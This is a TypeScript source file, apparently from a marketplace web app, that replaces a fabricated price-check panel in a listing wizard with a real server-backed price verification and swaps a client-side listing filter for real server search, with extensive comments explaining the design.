 * 🔴 IT IS ARITHMETICALLY INCAPABLE OF DISAGREEING. The band is centred on the
 * ask by construction, so PRICED FAIR is not a verdict, it is a tautology —
 * type $10 or type $10,000 and the panel congratulates you either way, at HIGH
 * CONFIDENCE, citing ninety days of comparable sales that were never looked
 * up. A seller pricing their first item is the exact person with no
 * independent read on the number, and this is the screen that tells them they
 * got it right.
 *
 * MECHANISM, in two halves:
 *
 * 1. THE CLICK, intercepted capture-phase on `document` — installPriceCheckRun's
 *    pattern, for its reasons (survives every rerenderKeepScroll re-bind; see
 *    writeGuard.ts's header for the full argument). 🪤 stopPropagation, NOT
 *    stopImmediatePropagation: we own other document capture listeners
 *    (installDealThreadLoader, installLinkFixups, and now the write guard's
 *    click AND keydown pair) and killing them to stop one button is the worse
 *    trade. Proven by execution, not asserted — see the test that registers a
 *    sibling capture listener AFTER this one and requires it to still run.
 *
 * 2. THE RENDER, by WRAPPING `window.renderWizPriceCheck` — the same idiom
 *    blockAuthRoute uses on route() and installRealDiscoverSearch uses on
 *    discSearchData, and available for the same reason: it is a top-level
 *    `function` declaration in a classic script, therefore a real, reassignable
 *    window property. His three HONEST states (no value yet, pre-run,
 *    "Checking the floor and recent comps…") are delegated to him untouched —
 *    that is his copy and it is all true. Only the fourth state, the fabricated
 *    reveal, is replaced, and it is replaced with a real answer rather than
 *    suppressed.
 *
 *    🔴 `wzPcState` NEVER REACHES "done". That single assignment is the whole
 *    fabrication (see __gbzSetWizardPriceCheckRunning's comment), so the bridge
 *    exposes no setter for it and this file never asks for one. Our own panel
 *    state is a closure variable here, invisible to app.js.
 *
 * WHAT IS SENT: mobile's create-flow body, with NO listingId — nothing has been
 * published yet, so there is no row for the server to resolve fields from
 * (routes/price-verify.ts:55 accepts `listingId OR (title and declaredValue)`,
 * and priceVerifier.ts:311 throws "title and declaredValue are required"
 * otherwise). The gate above guarantees a title, and Blake only renders the run
 * button when a value has been typed (app.js:1607 returns the value-less panel
 * with NO button when `!v`), so both required fields are present by
 * construction at every point this can fire.
 *
 * ⚠️ MOUNTED UNDER /listings. `POST /api/listings/price-verify`; the bare
 * `/api/price-verify` 404s.
 *
 * SAFE ON CLICK: requireAuth plus priceVerifyLimiter (20 per 15 minutes, keyed
 * on the user id) sit in front of the model spend, and an in-flight flag here
 * stops one impatient seller stacking requests.
 *
 * THE VERDICT IS RE-DERIVED, against the number currently typed — toDemoPriceCheck
 * does it via derivePriceVerdict, whose thresholds mirror the server's
 * deriveVerdict (priceVerifier.ts:79-86) exactly. That matters more here than on
 * the listing page: the seller can edit the value AFTER running the check, and a
 * stored verdict would then describe a price they no longer ask, with the ask
 * marker pointing somewhere the words contradict.
 */
export function installWizardPriceCheck(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
): () => void {
  const target = win as Window & {
    __gbzWizardDraft?: () => WizardDraft | null;
    __gbzWizardRef?: () => unknown;
    __gbzSetWizardPriceCheckRunning?: (running: boolean) => void;
    renderWizPriceCheck?: (w: unknown) => string;
    rerenderKeepScroll?: () => void;
  };
  const draftOf = target.__gbzWizardDraft;
  const draftRef = target.__gbzWizardRef;
  const setRunning = target.__gbzSetWizardPriceCheckRunning;
  const original = target.renderWizPriceCheck;
  if (typeof draftOf !== "function" || typeof draftRef !== "function" || typeof setRunning !== "function") {
    throw new Error("installWizardPriceCheck: bridge script did not define the wizard price-check helpers");
  }
  if (typeof original !== "function") {
    throw new Error("installWizardPriceCheck: app.js no longer defines a global renderWizPriceCheck() to wrap");
  }

  /** Our half of the panel's state. `null` means "Blake's own render is
   *  correct right now" — which covers his no-value, pre-run and running
   *  states, all three of which say something true.
   *
   *  🔴 A PANEL IS ONLY VALID FOR THE DRAFT IT ANSWERED. The first version of
   *  this installer stored a rendered answer and then ignored `w` on every
   *  subsequent render, which made the panel stale-sticky in four separate
   *  ways — all four executed against a real browser:
   *
   *    run at $500 -> "PRICED FAIR, $400-$600, dot 50%"   (correct)
   *    retype $5,000 -> UNCHANGED                          (should be OVERPRICED)
   *    switch to a different item -> UNCHANGED             (another item's band)
   *    NEW ITEM (wiz = null) -> UNCHANGED                  (a band for nothing)
   *
   *  and unrecoverable with it, because the reveal carries no #wz-runpc: after
   *  one success the Run button never came back.
   *
   *  🪤 IT WAS ALSO A REGRESSION AGAINST BLAKE. His own fake resets on a value
   *  edit — app.js:4869, `if (wzPcState) { wzPcState = null; }` on #wz-value's
   *  input — which returns his pre-run panel. That line is DEAD against a
   *  panel held in this closure, so intercepting the flow silently removed a
   *  correctness behaviour his version had. The fix mirrors his reset where it
   *  is right and improves on it where re-deriving is better than discarding.
   *
   *  So the state carries what it was an answer TO, and `resolve()` below
   *  re-checks that on every render. */
  interface PanelState {
    /** The wiz OBJECT this answers. `freshWiz()` mints a new one per draft, so
     *  reference identity is Blake's own "different listing" signal. */
    forDraft: unknown;
    /** The fields actually SENT, minus declaredValue — see resolve(). */
    fields: string;
    /** The declaredValue the verdict was derived against. */
    price: number;
    body: { message: string } | { pc: DemoPriceCheck } | { gate: true } | { deadEnd: string };
  }
  let panel: PanelState | null = null;
  let inFlight = false;

  /** The question the server was asked, minus the ask.
   *
   *  Everything here is a model input (priceVerifier.ts:223 builds its prompt
   *  from the item line, condition, category and description), so if any of it
   *  changes the band on screen is an answer to a question nobody is asking
   *  any more and the panel is cleared back to his honest pre-run state.
   *
   *  declaredValue is deliberately EXCLUDED and handled by re-derivation
   *  instead. It is also a prompt input, so a large move does deserve a fresh
   *  run — but discarding a real band on every keystroke in the price field
   *  would force a billed model call for a $5 tweak, and #662 already settled
   *  the precedent on the listing page: keep the stored band, re-derive the
   *  verdict against the number actually on screen. The verdict and the marker
   *  therefore tell the truth immediately, and the seller can re-run. */
  const fieldsOf = (draft: WizardDraft): string =>
    JSON.stringify([draft.title.trim(), draft.description.trim(), draft.category, draft.condition, draft.brand.trim()]);

  const repaint = (): void => target.rerenderKeepScroll?.();

  /** His pre-run shell (app.js:1631-1636) with the reason line replaced and
   *  the run button KEPT, so a gate failure or a network failure is
   *  retryable rather than a dead panel. */
  const messagePanel = (message: string): string =>
    '<div class="pricecheck prerun wz-pc">' +
    '<div class="pc-head"><span class="microlabel">GOBAZAAR Price Check</span></div>' +
    `<p class="pc-reason">${escHtml(message)}</p>` +
    '<button class="pc-run-btn" id="wz-runpc"><i>◈</i> Run GOBAZAAR Price Check</button>' +
    "</div>";

  /** The dead end: his pre-run shell with the reason line replaced and the
   *  run button GONE. resolve() keeps it while the QUESTION is the same and
   *  drops it when any of it changes: the item fields (title, description,
   *  category, condition, brand) AND the price, because the declared value is
   *  part of the prompt (priceVerifier.ts:341) and a different question
   *  deserves a fresh ask. A result panel treats the price differently (it
   *  re-derives the verdict) because a band is still true of the item; a dead
   *  end has no band to keep. */
  const deadEndPanel = (message: string): string =>
    '<div class="pricecheck prerun wz-pc">' +
    '<div class="pc-head"><span class="microlabel">GOBAZAAR Price Check</span></div>' +
    `<p class="pc-reason">${escHtml(message)}</p>` +
    "</div>";

  /** His reveal shape (app.js:875-889), carrying a real band.
   *
   *  The ask marker uses his formula through clampAskPct — a real band does
   *  not bracket the ask the way his invented one did, and an unclamped
   *  `left:` paints the dot outside the bar entirely (see clampAskPct). Null
   *  means the position cannot be computed at all, and the dot is omitted
   *  rather than emitted as `left:NaN%`.
   *
   *  The attribution line is rendered HERE rather than by demoTextFixups'
   *  fixPriceCheckAttribution, which deliberately excludes `.wz-pc`: that
   *  fixup reads the listing id out of `#/listing/<id>`, and the wizard has no
   *  listing. Same class names, so it lands in the same muted type scale. */
  const resultPanel = (pc: DemoPriceCheck, price: number): string => {
    const askPct = clampAskPct(((price - pc.min) / (pc.max - pc.min)) * 76 + 12);
    const attribution = priceCheckAttributionLabel(pc);
    return (
      '<div class="pricecheck wz-pc pc-reveal">' +
      '<div class="pc-head"><span class="microlabel">GOBAZAAR Price Check</span>' +
      `<span class="pc-badge">${escHtml(pc.confidence)}</span></div>` +
      '<div class="pc-range">' +
      `<span class="v">${escHtml(moneyText(pc.min))}</span>` +
      '<div class="pc-bar"><span class="band" style="left:12%;right:12%"></span>' +
      (askPct === null ? "" : `<span class="ask" style="left:${askPct}%"></span>`) +
      "</div>" +
      `<span class="v">${escHtml(moneyText(pc.max))}</span>` +
      "</div>" +
      `<div class="pc-verdict">◈ ${escHtml(pc.verdict)}</div>` +
      `<p class="pc-reason">${escHtml(pc.reasoning)}</p>` +
      (attribution === null
        ? ""
        : `<p class="pc-reason gbz-pc-attribution">${escHtml(attribution)}</p>`) +
      "</div>"
    );
  };

  /** Decide what this render should show, dropping state that has gone stale.
   *
   *  Called on EVERY render, which is the whole correction: the panel is
   *  re-validated against the draft in front of the seller rather than frozen
   *  at the moment the request resolved.
   *
   *  Three outcomes, in order:
   *   1. The draft is gone or is a different item -> drop the panel entirely
   *      and hand back to Blake, whose pre-run state carries the Run button.
   *      That is also the only route back to a re-run after a success, since
   *      his reveal shape has no button of its own.
   *   2. A gate message -> RE-RUN the gate. A "add a description" line must
   *      not outlive the description being added; recomputing is simpler than
   *      trying to invalidate it, and it is right by construction.
   *   3. A result -> keep the band (it is the real market answer for this
   *      item) and re-derive the verdict and the marker against the number
   *      currently typed.
   *
   *  It mutates `panel` on the stale paths. That is memo invalidation during a
   *  read, not rendering-with-side-effects: the only thing it can do is
   *  discard, and discarding is what makes the next render honest. */
  const resolve = (w: unknown): string | null => {
    if (!panel) return null;
    const draft = draftOf();
    if (!draft || w !== panel.forDraft || fieldsOf(draft) !== panel.fields) {
      panel = null;
      return null;
    }
    if ("gate" in panel.body) {
      const gate = wizardPriceCheckGate(draft.title, draft.description);
      if (gate === null) {
        panel = null;
        return null;
      }
      return messagePanel(gate);
    }
    if ("message" in panel.body) return messagePanel(panel.body.message);
    if ("deadEnd" in panel.body) {
      if (draft.declaredValue !== panel.price) {
        panel = null;
        return null;
      }
      return deadEndPanel(panel.body.deadEnd);
    }

    /* 🔑 RE-DERIVED, NOT REPLAYED. derivePriceVerdict's thresholds mirror the
       server's deriveVerdict (priceVerifier.ts:79-86), so a seller who runs
       the check at $500 against a $400-$600 band and then retypes $5,000 sees
       OVERPRICED with the dot pinned at the band's right edge — instead of the
       PRICED FAIR and centre dot the frozen panel used to keep showing. */
    const price = draft.declaredValue;
    const pc = price === panel.price
      ? panel.body.pc
      : { ...panel.body.pc, verdict: derivePriceVerdict(price, panel.body.pc.min, panel.body.pc.max) };
    return resultPanel(pc, price);
  };

  const wrapped = (w: unknown): string => resolve(w) ?? original.call(win, w);
  target.renderWizPriceCheck = wrapped;

  /** Who a panel belongs to, captured when the question is ASKED.
   *
   *  🪤 Captured at request time, never at resolve time. Attaching a
   *  late-arriving answer to whatever draft happens to be on screen would let
   *  an in-flight request paint one item's band onto the next item the seller
   *  opened — the same class of wrong as the stale panel itself, just arriving
   *  by a different route. Held here, a switch mid-flight fails the identity
   *  check on the very next render and the answer is discarded. */
  const snapshot = (draft: WizardDraft): Omit<PanelState, "body"> => ({
    forDraft: draftRef(),
    fields: fieldsOf(draft),
    price: draft.declaredValue,
  });

  const finish = (at: Omit<PanelState, "body"> | null, message: string | null): void => {
    inFlight = false;
    setRunning(false);
    panel = message === null || at === null ? null : { ...at, body: { message } };
    repaint();
  };

  const onClick = (event: Event): void => {
    const el = (event.target as Element | null)?.closest?.("#wz-runpc");
    if (!el) return;
    // Suppress his fake FIRST, before any early return below — a click we
    // decline to service must still not fall through to the fabrication.
    event.stopPropagation();
    event.preventDefault();
    if (inFlight) return;

    const draft = draftOf();
    // No wizard open at all. Nothing to say and nothing to check.
    if (!draft) return;

    const at = snapshot(draft);

    /* Stored as a GATE panel rather than as its text: resolve() re-runs the
       gate on every render, so "Add a description to run the price check."
       disappears the moment a description is typed instead of outliving the
       thing it asked for. */
    if (wizardPriceCheckGate(draft.title, draft.description) !== null) {
      panel = { ...at, body: { gate: true } };
      repaint();
      return;
    }

    inFlight = true;
    panel = null;
    // Honest now: "Checking the floor and recent comps…" describes a request
    // that is actually outstanding.
    setRunning(true);
    repaint();

    const price = draft.declaredValue;
    authFetch("/api/listings/price-verify", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      /* Mobile's create-flow body (hooks/usePriceCheck.ts:50-58 as called by
         create.tsx:1006), including its two client-side defaults. No
         listingId — see this function's header. */
      body: JSON.stringify({
        title: draft.title.trim(),
        description: draft.description.trim(),
        category: draft.category ?? "general",
        declaredValue: price,
        condition: draft.condition ?? "good",
        brand: draft.brand.trim() || undefined,
        /* The slab's grade, only for a graded draft. Without it the server prices
           a PSA 10 as the raw card (priceVerifier gradeParts). A raw or
           half-picked draft sends none of the three, so its body is unchanged. */
        ...(draft.graded && draft.grader && draft.grade != null
          ? { graded: true, grader: draft.grader, grade: draft.grade }
          : {}),
      }),
    })
      .then(async (res) => {
        if (res.status === 401 || res.status === 403) {
          finish(at, PRICE_CHECK_SIGNIN_COPY);
          return;
        }
        // The seller owns the number here, so the sentence says so. Attached
        // to the draft that ASKED, like a result; resolve() decides how long
        // it stands.
        const deadEnd = await readPriceCheckDeadEnd(res, true);
        if (deadEnd !== null) {
          inFlight = false;
          setRunning(false);
          panel = { ...at, body: { deadEnd } };
          repaint();
          return;
        }
        // 429 lands here too, and deliberately: priceVerifyLimiter is a real
        // reason market data could not be reached for THIS caller right now,
        // and "Try again." is true of it — the window rolls.
        if (!res.ok) {
          finish(at, PRICE_CHECK_FAILURE_COPY);
          return;
        }
        const mapped = toDemoPriceCheck(await res.json(), price);
        // A 200 whose body is not a usable price check. There is nothing true
        // to paint and the fabrication is the only alternative, so: fail.
        if (!mapped) {
          finish(at, PRICE_CHECK_FAILURE_COPY);
          return;
        }
        inFlight = false;
        setRunning(false);
        // Attached to the draft that ASKED, never to whatever is on screen when
        // the answer lands — see snapshot().
        panel = { ...at, body: { pc: mapped } };
        repaint();
      })
      .catch(() => finish(at, PRICE_CHECK_FAILURE_COPY));
  };

  const doc = win.document;
  doc.addEventListener("click", onClick, true);
  return () => {
    doc.removeEventListener("click", onClick, true);
    // Restore his renderer, so a teardown leaves nothing of ours behind. Only
    // if it is still OURS: a later installer may have wrapped it in turn, and
    // clobbering that would be worse than leaving this one in place.
    if (target.renderWizPriceCheck === wrapped) target.renderWizPriceCheck = original;
  };
}

/* ============================================================================
 * Task target #1 — #/discover: real search.
 * ==========================================================================*/

/** How long a burst of keystrokes must go quiet before a real search fetch
 *  actually fires — standard debounce practice, not tuned against anything
 *  in this repo. Exported so a test can wait a deterministic amount rather
 *  than a magic number. */
export const DISCOVER_SEARCH_DEBOUNCE_MS = 300;

/**
 * Real listing search for #/discover, replacing app.js's own client-side
 * filter of the pre-loaded LISTINGS array — which silently caps results at
 * whatever the floor happens to hold (only the newest 100 until 2026-09-27), exactly what the task
 * brief warns against. Uses GET /api/listings?q=…&envelope=1 (listings.ts:
 * 333-513), the SAME pg_trgm-backed search buildListingSearchCondition /
 * buildListingFuzzyCondition already give the mobile app, including its own
 * `approximate` flag for the exact-then-fuzzy fallback (listings.ts:423-434)
 * that backs Blake's already-wired "No exact matches. Showing results for
 * similar terms." copy (app.js:572).
 *
 * Wraps window.discSearchData exactly the way blockAuthRoute wraps
 * window.route — both are top-level `function` declarations in app.js's
 * classic script and therefore real, reassignable window properties, unlike
 * LISTINGS/USERS's `const` bindings (see the file header).
 *
 * discSearchData is called SYNCHRONOUSLY, once per keystroke, entirely
 * inside app.js's own control flow (app.js:4609's `input` listener ->
 * syncDisc() -> renderDiscResults() -> discSearchData(q), one tick, no
 * await anywhere) — there is no hook this file can add to make that chain
 * async without editing app.js. So the real answer arrives on a SECOND
 * pass: every call answers synchronously right away (Blake's own,
 * unmodified original implementation still supplies the `users`/people half
 * every time, and is also the instant `rows`/`approximate` placeholder
 * while a query's real fetch is in flight — an honest "today's best
 * client-side guess", never fabricated), and once the debounced real fetch
 * resolves, it re-dispatches an "input" event on #disc-search so app.js's
 * OWN listener re-renders through the now-cached real answer. One extra
 * paint per genuinely NEW query; zero for a repeated one.
 *
 * New real matches are also merged into the live LISTINGS/USERS globals
 * (via the bridge's __gbzMergeListing) before being returned. A search
 * result row links to #/listing/:id (app.js:4613), and route() resolves
 * that id by scanning LISTINGS (app.js:3677-3680) with a SILENT fallback to
 * the home view when it isn't found (see the task brief's "route fallbacks
 * are silent" warning) — a real match the floor did not pre-load has to
 * be installed, or clicking it would land the visitor on the homepage with
 * no error at all.
 */
export function installRealDiscoverSearch(
  win: Window,
  authFetch: (input: RequestInfo | URL, init?: RequestInit) => Promise<Response>,
): void {
  type DiscSearchResult = { rows: DemoListing[]; users: DemoUser[]; approximate: boolean };
  const target = win as Window & {
    discSearchData?: (qRaw: string) => DiscSearchResult;
    __gbzMergeListing?: (listing: DemoListing, user: DemoUser) => boolean;
  };
  const original = target.discSearchData;
  if (typeof original !== "function") {
    throw new Error("installRealDiscoverSearch: app.js no longer defines a global discSearchData()");
  }
  const rawMerge = target.__gbzMergeListing;
  if (typeof rawMerge !== "function") {
    throw new Error("installRealDiscoverSearch: bridge script did not define window.__gbzMergeListing");
  }
  // Re-bound to a definitely-typed const for the same reason
  // installLiveListingComments re-binds setComments: referenced below inside
  // a nested .then() callback, past where the guard above's narrowing reaches.
  const merge: (listing: DemoListing, user: DemoUser) => void = rawMerge;

  type RealResult = { rows: DemoListing[]; approximate: boolean };
  const cache = new Map<string, RealResult>();
  const inFlight = new Set<string>();
  // ONE shared timer, not one per key: a debounce exists to wait for typing
  // to STOP, not to rate-limit each distinct substring. Keying it per-query
  // would fire a fetch for every intermediate substring of a fast typist's
  // final query ("j", "ja", "jac", "jack" each getting their own 300ms
  // timer) instead of one fetch for "jack" alone — every new keystroke
  // cancels whatever the PREVIOUS one queued, so only a query the visitor
  // actually pauses on ever reaches the network.
  let debounceTimer: ReturnType<typeof win.setTimeout> | null = null;

  function retrigger(key: string): void {
    const input = win.document.getElementById("disc-search") as HTMLInputElement | null;
    if (!input) return; // navigated away from #/discover — nothing to refresh
    if (input.value.trim().toLowerCase() !== key) return; // superseded by a later keystroke, which will cover it
    input.dispatchEvent(new Event("input", { bubbles: true }));
  }

  function fetchReal(key: string): void {
    inFlight.add(key);
    authFetch(`/api/listings?q=${encodeURIComponent(key)}&envelope=1&limit=30`)
      .then((res) => (res.ok ? (res.json() as Promise<{ listings: ApiListingRow[]; approximate: boolean }>) : null))
      .then((body) => {
        if (!body) return;
        const rows: DemoListing[] = [];
        for (const row of body.listings ?? []) {
          if (!RENDERABLE_CATEGORIES.has(row.listing?.category)) continue; // same crash guard as installFloorListings
          const { listing, user } = mapListingRow(row);
          merge(listing, user);
          rows.push(listing);
        }
        cache.set(key, { rows, approximate: !!body.approximate });
        retrigger(key);
      })
      .catch(() => {
        // leave `key` uncached — the wrapper keeps returning Blake's own
        // local-filter fallback until a later keystroke (a new debounce
        // window) retries it
      })
      .finally(() => {
        inFlight.delete(key);
      });
  }

  target.discSearchData = function (qRaw: string): DiscSearchResult {
    const local = original(qRaw);
    const key = qRaw.trim().toLowerCase();
    const real = cache.get(key);
    if (real) {
      return { rows: real.rows, users: local.users, approximate: real.approximate };
    }
    if (debounceTimer) win.clearTimeout(debounceTimer);
    debounceTimer = win.setTimeout(() => {
      debounceTimer = null;
      if (!inFlight.has(key)) fetchReal(key);
    }, DISCOVER_SEARCH_DEBOUNCE_MS);
    return local; // instant, honest fallback while the real fetch is pending
  };
}
